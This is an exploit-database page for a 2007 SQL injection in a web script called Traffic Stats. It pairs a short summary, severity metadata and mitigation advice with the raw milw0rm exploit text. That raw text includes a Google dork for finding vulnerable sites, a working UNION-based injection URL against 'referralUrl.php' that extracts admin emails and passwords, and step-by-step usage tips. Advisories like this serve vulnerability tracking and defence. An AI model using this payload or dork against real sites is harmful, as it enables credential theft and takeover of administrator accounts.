header-logo
Suggest Exploit
vendor:
by:
t0pP8uZz & xprog
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Traffic Stats SQL Injection Vulnerability

The vulnerability allows an attacker to extract admin email/passwords by exploiting a SQL Injection vulnerability in the 'referralUrl.php' script. By using a UNION-based SQL injection, an attacker can retrieve the email and password of the admin from the 'StatAdmin' table.

Mitigation:

To mitigate this vulnerability, the application should implement proper input validation and sanitization techniques to prevent SQL injection attacks. Additionally, using parameterized queries or prepared statements can help protect against SQL injection.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+                  Traffic Stats SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:" If you would like to contact us, our email address is" traffic


DESCRIPTION:
pull out admin email/passwords


EXPLOITS:
http://server.com/Script_Dir/referralUrl.php?offset=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password)/**/FROM/**/StatAdmin/*


NOTE/TIP:
first you must register a account then click ad site, and add random sites, then paste injection
admin login is at /admin/ only password is needed :D


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+                  Traffic Stats SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-16]